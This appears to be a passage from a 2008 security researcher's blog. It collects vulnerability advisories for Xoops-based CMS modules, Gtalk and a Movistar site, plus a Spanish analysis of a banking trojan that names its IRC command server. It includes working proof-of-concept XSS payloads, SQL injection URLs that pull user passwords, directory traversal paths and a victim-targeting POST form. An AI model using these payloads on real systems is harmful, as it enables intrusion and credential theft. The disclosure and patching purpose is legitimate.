$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');

vulnerable code itemsxpag variable in lines 56 to 67 in search.php :

//NUmero de resultados por página
if (isset($_GET['itemsxpag'])){
//setcookie('itemsxpag', $_GET['itemsxpag'], 86400);
$_SESSION['itemsxpag'] = $_GET['itemsxpag'];
$limit = $_GET['itemsxpag'];} else {
$limit = $_SESSION['itemsxpag'];
}if ($limit <= 0){
$limit = $xoopsModuleConfig['cols'] * 3;
$_SESSION['itemsxpag'] = $limit;}


exploit all tree variables:

http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4
"><script>alert(1)</script>&Submit=Go%21&idc=0
"><script>alert(2)</script>
&key="><script>alert(3)</script>

This is a persistent script insercion in 'itemsxpag' variable because the value
of the variable is inserted directly in '$_SESION' & '$Limit' variables.:

http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=
&key=lalalalalala

try to navigate to index and go again to minishop module
and try to search something in the search box of module.
Wen show the results the script executed before is
executed again.


#####################
Posible SQL Injection
#####################

wen exploit in the example of script insercion
if we look web down we have a SQL Error:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\">' at line 2

we can try to inject some SQL code like
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users
/**/LIMIT/**/1&idc=0&key=aaa

http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1
&Submit=Go%21&idc=&key=aaaaaa

and we get this error Incorrect usage of UNION and ORDER BY...

we think in a classic SQL error , but i make several test with
union select and concat , etc etc and don´t have a working exploit
..them this is a unknow impact , and need to patch

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Kshop module search variable and field remote XSS

Wednesday, August 06, 2008
##########################################
Kshop module search variable&field remote XSS
Vendor url:http://www.kaotik.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
kshop-module-search-variable-and-field.html
Vendor notify:no exploit available:YES
##########################################


Kshop is a E-commerce php/Mysql script module for
multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Kshop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the
application does not validate 'Search' variable and
search form field include in this module upon
submission to 'kshop_search.php' script in Kshop module.
This could allow a user to create a specially crafted form
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss of integrity.


#################
Versions
################·

Kshop module 2.22

i make a test with ImpressCMS
and this CMS in kshop module
have version 2.23 ????


it´s posible that prior versions
are affected too.

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

###################
Solution
###################

At this moment ,no have solution...

but you can make a simple patch ,open kshop_search.php
inside kshop module folder arround line 45 you have
[code]

$xoopsTpl->assign('searchTerm',$_POST['search']);

you can use strip_tags() PHP function , like:

$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));

now it´s patched , because this remove all tags in the search variable.

or you can use htmlentities() PHP function for patch much more clean like :

$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));

or ,much moore restrictive:

$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));

[/code]

Happy patch !!!

###################
Proof of Concept.
###################

This Issue could not exploit directly by URL
because the form field have a limitation of 20 chars
and we need a POST to exploit ,for that we can´t exploit
directly by url because it is a GET and we need a POST.

This is not a problem, we can make a form with the POST
and without any restriction in the form field for Exploit it

put some javascript or html code in the form field

Example: "><script>alert()</script>

its necesary that you put "> before the code.


<form action="http://[victim]/modules/kshop/kshop_search.php" method="POST">

<input type="text" name="search" value="Put your XSS Here !!!">

<input type="image" src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form>




############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Gtalk 1.0.0.105 html injection and Stealing messages

Wednesday, June 25, 2008
############################################
Gtalk 1.0.0.105 html injection and Stealing messages
Vendor url:http://www.google.com
Advisore:http://lostmon.blogspot.com/2008/06/
gtalk-100105-html-injection-and.html
Vendor notify:yes exploit available:yes
############################################

This post was Updated on 12-07-2008




Aparently this flaw now is fixed for exploit remote, but it
continue still vulnerable in a local mode example

before patch if a attacker send to victim mailto: "><h1>Lostmon</h1>
it is executed in the victims gtalk 1.0.0.105

affter the patch the server converts mailto:"><h1>Lostmon</h1> in
mailto: h1 Lostmon /h1 (very good )

but if the victims send to attacker the code, it continue
executing in the victim's machine , then ... the posible
exploit of this issue for remote users are pached !!!!! Good work ,

It continue vulnerable at local exploit. :|


GTalk is a service offered by Google instant messaging.
It allows communication via traditional text or voice and is
also integrated with Gmail. According to information released
last year, Google Talk is used by more than 3 million users
worldwide.



GTalk contains a flaw that allows a remote
cross site scripting or HTML injection attack.This flaw
exists because the application does not validate 'http'
and 'mailto' upon submission to conversation window.
This could allow a user to create a specially crafted URL
or mailto address that would execute arbitrary code
in a user's gtalk within the trust relationship
between the gtalk and the server,leading loss of integrity

A remote user can Stealing messages on the target Gtalk user.


################
Versions afected
################

This Issue aparently no affects Gtalk labs edition
( testing without results)

This issue aparenly no affects Gtalk Web user
( testing without results in web client from Mail.google.com)

This issue aparently no afects Gtalk Gadget users
(testing without results in web client from http://talkgadget.google.com/talkgadget/popout?hl=es)


##################
TIme line
##################

discovered: 05-06-2008
Vendor notify: 07-06-2008
Vendor reponse: 07-06-2008
Vendor fix:
Public Disclosure: 25-06-2007

########################
Solution
########################

No solution at this time , however all users with a
vulnerable Gtalk client, can talk without problems
with Google talk labs edition, or by Web client in
Gmail account , or they can use the Google Gtalk Gadget.

################################
How to reproduce or how to test:
################################

#################
HTML Injection
#################

For this test we need two accounts of Gmail (attacker
and Victim), and Gtalk version 1.0.0.105
In this text We only send a h1 html tag with a text and
it is executed in the victims Gtalk.

let´s Go !!!

1- Open one account in explorer ( go to mail.google.com
and make login with the attacker mail)

2- Open the second account in Gtalk ( open Gtalk and make
loging with victim´s mail)

3- In the attacker accound open a chat with the victims

4- Write this msg To victim http://"><h1>Lostmon</h1>

Wen gtalk try to convert the text link in a clicable URL,the html
tag 'h1' is executed in the victim´s machine; and now all what
the attacker write , have the attribute 'h1' in the victim´s Machine.

For solve this situation , the gtalk user need to write something
to attacker.

If Gtalk user try to send the same malformed link to a webuser,
it is executed in his machine and it does not work in the webuser
machine and he only have a clicable link and part of the url with
the html, is not clicable . them the Gtalk users via web are not
vulnerable.

if the Gtalk user (victim) try to send it to the webuser (attacker)
the html is executend in the Gtalk client and now all what victims
write has the attibute 'h1' ..... for solve the attacker need to send any
text to victim, and now the conversation window are free of 'h1' html tag.

I make several probes with other tags ,like script or img , but at
this moment i can´t bypass the filter or i can´t look ...moore Deep :P

This issue comes in Gtalk wen try to conver text in a clicable url ,
this flaw affects to mailto function too !!!

We can do the same test but wen try to send the msg send this
mailto:"><h1>Lostmon</h1>.

Continue Testing with Gtalk labs edition as the attacker and
gtalk 1.0.0.105 as the victim and the attacker can send to
victims with the same result.

We can try to insert other html tag like script , and aparently if we
look the sorce code of the Gtalk window it is executed, but does no
appear nothing ....send to victim :
http://"><h1>Lostmon</h1> and
look for the source code of the Gtalk window.


If the attackers send to victims:
http://&#34&#62&#60&#104&#49&#62&#76&#111&#115&#116&#109&#111&#110&#60&#47&#104&#49&#62

Gtalk only convert this url in his html value
http://"><h1>Lostmon</h1>
but don´t execute ...

Gtalk accept html encoding them !!!

#######################################
source in victims conversation window
########################################

<DIV class="msg 1st"><SPAN style="FONT-WEIGHT: bold">Lostmon</SPAN>:

<A href='http://"></a href=""><h1>Lostmon</h1'>http://"&gt;</A>

<H1>Lostmon</H1</a>&gt;</DIV>

###########################
Proof Of Messages Stealing
###########################

Try the attacker send with Gtalk labs edition and victim with gtalk 1.0.0.105

If victim has enable notifications for example wen others users talking to he
and he have minimice Gtalk,a attacker can send to he :

http://"><script>alert()</script>

or

mailto:"><script>alert()</script>

And continue talk with the victim , has only in his window http://">
but it the attacker continue talking with he
the victim only can view what say the attacker by notifications
for a few seconds because wen look his window he only has http://">

This can be used to talk Stealing of to other type of spoffing attacks.
This situation is end wen the victim talk to attacker.


If the victim´s send to attacker http://"><script>alert()</script> ,
them the victim can´t look any text what he send.
the victims need that,the attackers send a msg to victim for solve this
situation , and now the victim can look again his mesages.


#################
Conclusion
#################


With the result of all of this test, we can think that only the html
filter for Gtalk 1.0.0.105 does not work properly and this can be a potential
Vulnerability because a attacker can execute html code in the victim´s machine
and the attacker can stealing menssages in victim´s machine ....


########################€nd##################


Thnx to estrella to be my light.
Thnx To FalconDeOro For his support.
Thnx to Imydes From www.imydes.com For testing with me.
Thnx To all Lostmon Group Team For his continue support
Thnx to all Google security Team for his patience and fast Response

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bcoos highlight.php traversal file access

Sunday, May 18, 2008
####################################
Bcoos =< 1.0.13 highlight.php traversal file access
Vendor URL: http://www.bcoos.net
Advisore:http://lostmon.blogspot.com/2008/05/
bcoos-highlightphp-traversal-file.html
Vendor notify:yes Exploit available:yes
####################################


bcoos is content-community management system written in PHP-MySQL

Directory traversal vulnerability in bcoos 1.0.13 and earlier
allows remote attackers to read arbitrary files via a ../
(dot dot) in the CD command or if the attacker know the full path.

Only Can read Files with extension, if the file don´t have extension
bcoos redirect to index.

##############
Versions
##############

bcoos 1.0.13
bcoos 1.0.12
bcoos 1.0.11
bcoos 1.0.10
bcoos 1.0.9

##############
Solution
##############

No solutions was available at this time !!!

Vendor Bugtrack : http://www.bcoos.net/modules/
devtracker/view_issue.php?issue_id=2467

##############
TimeLine
##############

Discovered:02-03-2008
vendor notify:18-05-2008
vendor response:
vendor fix:
Disclosure:18-05-2008

################
Proof of Concept
################

http://localhost/bcoos/class/debug/
highlight.php?file=C:\boot.ini

http://localhost/bcoos/class/debug/
highlight.php?file=../../../../../boot.ini

For exploit this issue the attacker need webmaster privileges.
But if a system has multiple webmasters.. all can read files
outside webserver root directory.

The file what we want to access need a extension if the file no
have extensionvwe can´t read it, and bcoos redirects to index.

################€nd##################

--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Canal cliente de Movistar Vulnerable a XSS

Saturday, May 17, 2008
######################################
Canal cliente de Movistar Vulnerable a ataques Cross-Site Scripting
######################################

La pagina De movistar https://www.canalcliente.movistar.es
se haya afectada por una vulnerabilidad llamada Cross-site
scripting (XSS) atraves de la cual un atacante puede inducir
a un usuario victima a visitar dicha pagina, atraves de una URL
modificada especialmente y ejecutar codigo html o javascript en
el navegador del usuario victima , en el contexto de seguridad
en el margen de confianza entre el navegador y el servidor
pudiendo obtener la informacion acabada de enviar por el
usuario o establecer acciones por el.

Existe una prueba de concepto y una imagen de muestra.
Movistar fue avisado atraves de un correo y de su sistema de contacto
en la misma web pero no se ha obtenido respuesta.

#################
Exploit
#################
https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%53%65%20%62%75%73%63%61%20%48%34%78%30%72%3C%73%74%72%6F%6E%67%3E%2C%20%63%6F%6D%6F%20%4C%6F%73%74%6D%6F%6E%20%70%6F%72%20%65%6A%65%6D%70%6C%6F%3A%3C%70%3E%0D%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%3C%2F%61%3E%3C%2F%70%3E%3C%2F%68%31%3E%0D%0A%20%45%73%20%70%65%6C%69%67%72%6F%73%6F%20%79%20%76%61%20%61%72%6D%61%64%6F%3C%62%72%3E%20%4C%6C%65%76%61%20%75%6E%20%70%6F%72%74%61%74%69%6C%20%79%20%75%6E%20%70%61%6C%6D%20%65%6E%20%6C%61%73%20%6D%61%6E%6F%73%3C%62%72%3E%20%73%69%20%6C%65%20%76%65%6E%20%3B%20%6E%6F%20%6C%65%20%70%72%6F%70%6F%72%63%69%6F%6E%65%6E%20%63%6F%6E%65%78%69%6F%6E%20%61%20%69%6E%74%65%72%6E%65%74%2E%3C%2F%70%3E%3C%2F%73%74%72%6F%6E%67%3E%3C%70%3E%3C%2F%70%3E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%68%31%3E%42%79%20%4C%6F%73%74%6D%6F%6E%3C%2F%68%31%3E


--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Multiple Browsers DoS by evil javascript code

Sunday, April 06, 2008

Multiple Browsers DoS by Lostmon


Tested in windows with IE7,IE8,Mozilla Firefox,Avant browser,
Flock Browser,Safari browser, Opera Browser aparently is
not vulnerable.

In all cases the browser become slow & unresponsive and
aplication is hang, resulting in a recoverable DoS issue.
The code play with the document.href ,window.open.

I decide to ofuscate the code to dificult others to look.

Internet Explorer:
Aplicación que no responde: iexplore.exe, versión 8.0.6001.17184,
módulo que no responde hungapp, versión 0.0.0.0, dirección
que no responde 0x00000000.

In ie 8 i have surprised, because if we open the exploit localy
from the desktop for example ... and we allow the activex warnnig
and allow popups , iexplorer opens a window with the contentcof c:\

I have surprised because the url(location.href) relative in the
exploit wen we open from desktop is C:\documents and
settings\YOUR_USER\desktop\browser_die.html

so why explorer opens a window with c:\ .. this is a incorrect
location.href location....

Flock Browser:

Aplicación que no responde: flock.exe, versión 1.1.1.0,
módulo que no responde hungapp, versión 0.0.0.0, dirección
que no responde 0x00000000.

Mozilla Firefox:
Aplicación que no responde: firefox.exe, versión 1.8.20080.31114,
módulo que no responde hungapp, versión 0.0.0.0, dirección que
no responde 0x00000000.


Avant Browser:
Aplicación que no responde: avant.exe, versión 11.5.0.0,
módulo que no responde hungapp, versión 0.0.0.0,
dirección que no responde 0x00000000.

In avant browser if we have on the popups blocker the browser
become unresposive in a few seconds , if wen don´t have on,
the browser detect that this is a slow script, but become hang too.

Safari For windows:

In safari for windows ,if we have open a window with google
for example,and open the exploit in a new safari window with
the exploit an click in the button,safari opens a few popups,
and aftter close all popups and close of other windows.
too the first window what open with google :O

Demo of exploit:



Thnx to imydes from www.imydes.com for his support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://Lostmon.blogspot.com
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Gusanito.exe descarga troyano bancario y conecta a irc

Wednesday, March 12, 2008
########################################################
Gusanito.exe descarga troyano bancario y conecta a irc
Articulo original:http://lostmon.blogspot.com/2008/03/
gusanitoexe-descarga-troyano-bancario-y.html
########################################################

Hoy me llego un nuevo intento de pishing disfrazado
con una targeta de gusanito.com.

Despues de un leve estudio sobre el mismo descubro que
el link de la targeta lleva a la descarga directa de
un archivo llamado "gusanito.exe".

##########################
imagen del mail
##########################


Me descargo el ejecutable y despues de analizar el
archivo , me sorprendo por lo poco escondido que
esta en si el intento de fraude.

###########################
Imagen cabeceras mail
###########################


Si el usuario incauto descargo y ejecuto, ya que
se esconde bajo el incono de un dibujo, el archivo
esconde un troyano bancario llamado winmedia.exe
el troyano es Trojan-Spy.Win32.Banker.anv o alguna
de sus variantes su informacion puede consultarse aqui:

http://www.viruslist.com/en/viruses/encyclopedia?virusid=105552


Si observamos el codigo en hexa del ejecutable "gusanito.exe"
encontramos varias cosas curiosas:

La ruta donde el el atacante a compilado su proyecto asi
como el nombre de usuario con el que se haya logeado en su
maquina.

C : \ D o c u m e n t s a n d S e t t i n g s \ h u g o \
E s c r i t o r i o \ H u g o T o o l s F I N A L I S I M O
3 . 0 \ H u g o T o o l s \ D R O N E S \ P r o y e c t o 1 . v b p

Entre el codigo tambien se ve que interactua con MSN ,obteniendo
la lista de contactos y mandando in mensage a los contactos con varios
mensages distintos, imitando alguna de los tipicos virus de msn
con los mensages , mira estas fotos o mira este video hermoso hermoso
hermoso entre otras (en el archivo hexa pueden verse claramente)

lanzando asi la url para el usuario victima junto con la frase.

#########################################
imagen clave msn y imagen frases msn
#########################################




#############################################
Imagen link descarga y clave registro windows
###############################################


Ademas , se establece una conexion al servidor ccpower.com.mx
por irc con un nick Drone??? donde ??? son numeros aleatorios
y entrando al canal #banamex donde de los casi 400 usuarios
del canal ,el 90% son victimas infectadas.

#############################
conexion irc
#############################


Es desde este canal desde donde se manejan a los usuarios
victima ,pasando por el canal las direcciones de email
de los contanctos de las victimas y obteniendo los datos
que hayan podido ser capturados por el atacante , bien sea
por el troyano o bien sea por las funciones de keyloger
que posee el ejecutable.

############################################
Imagen vista irc
############################################



ni que decir tiene que fuy baneado de su irc ...
creo que no tienen sentido del humor XDDDD

La proteccion es la misma de siempre, no descargar
archivos desde fuentes no fidelignas,

Tener el antivirus actualizado

Y NO EJECUTAR NADA SIN SABER QUE ES Y SIN HABERLE
PASADO ANTES UN ANTIVIRUS !!!!!!!

################################
Analisis automatico del archivo
(gracias a Jose luis)
################################

Un examen automático da esto:

Intenta replicarse a través de una red.

Se copia en la carpeta de Windows:

C:\Windows\WinMedia.exe

Crea o modifica las siguientes entradas del registro:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IpInIp

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IASSDO
EnableFileTracing = 0x00000000
EnableConsoleTracing = 0x00000000
FileTracingMask = 0xFFFF0000
ConsoleTracingMask = 0xFFFF0000
MaxFileSize = 0x00100000
FileDirectory = "%windir%\tracing"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SystemMigration = "%Windir%\WinMedia.exe"

Se intenta conectar a la siguiente dirección:

irc.ccpower.com.mx

Se conecta y envía los siguientes datos:

USER nomail@nomail.com localhost9195 irc.ccpower.com.mx :botitooo
NICK Drone-919-5
JOIN :#banamex
PONG :response
PONG ::+i
PONG :list.
PONG ::.VERSION.
PONG ::.status
PONG ::.id
PONG ::.stats
PONG ::.uptime
PONG :PROCESS_NAME_TO_TERMINATE
PONG ::.ident
PONG ::.keylog
PONG ::.httpserver
PONG :50
PONG :-r
PONG :60
USER nomail@nomail.com localhost11606 irc.ccpower.com.mx :botitooo
NICK Drone-1160-6


#################€nd#####################

Thnx to Jose Luis from http://www.vsantivirus.com
por el analisis automatico, su paciencia y ayuda :)

Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

bcoos /mysections/ratefile.php lid variable SQL injection

Thursday, February 07, 2008
############################################
bcoos /mysections/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2008/02/
bcoos-mysectionsratefilephp-lid.html
vendor notify:NO exploits available: YES
############################################

bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid' variable,
and adresses/ratefile.php script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.



#################
Versions:
#################

bcoops =< 1.0.11 vulnerable

#################
Solution:
#################

No solution at this time !!!
Also you can try to edit the source code and
put this code to mitigate 'union' injection:

open modules/mysections/ratefile.php

arround line 76 found this code:

exit();
} else {

you can change for:

exit();
}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

And now this union sql attack is patched :D

#################
Timeline:
#################

Discovered:31-01-2008
vendor notify:--------
vendor response:-------
disclosure:07-02-2008


#################
SQL intection:
#################


http://localhost/modules/mysections/ratefile.php?lid=
-99%20UNION%20SELECT%20pass%20FROM%20bcoops_users%20LIMIT%201



#######################€nd##############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

bcoos & E-xoops DevTracker module two variables XSS

Monday, February 04, 2008
############################################
bcoos& E-xoops DevTracker module two variables XSS
vendor url: http://www.bcoos.net
Vendor url: http://www.e-xoops.com
Advisore: http://lostmon.blogspot.com/2008/02/
bcoos-and-e-xoops-devtracker-module-two.html
vendor notify:yes exploits available: YES
############################################



bcoos and E-xoops are two content-community management
system written in PHP-MySQL.

bcoos and E-xoops contains a flaw that allows a remote
cross site scripting attack.This flaw exists because the
application does not validate 'order_by' & 'direction'
variables upon submission to 'index.php' script in
DevTracker module.This could allow a user to create a
specially crafted URL that would execute arbitrary code
in a user's browser within the trust relationship
between the browser and the server,leading loss ofintegrity



#################
Versions:
#################

bcoos =< 1.1.11 DevTracker (¿ 3.0 ?)
E-xoops =< 1.0.8 DevTracker v0.20

And posible early versions with this module instaled.

Here you have a src reference for
E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html


#################
Solution:
#################

No solution available at this time
Try to edit the source code.


#################
Timeline:
#################

Discovered:01-02-2008
vendor notify:03-02-2008
vendor response:-------
disclosure:04-02-2007

#############
Examples
#############

http://[victim]/modules/devtracker/index.php?proj_id=1&order_by=
priority&direction=ASCquot;><script>alert()</script>

http://[Victim]/modules/devtracker/index.php?proj_id=1
&order_by=priorityquot;><script>alert()</script>
&direction=ASC


#######################€nd###################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...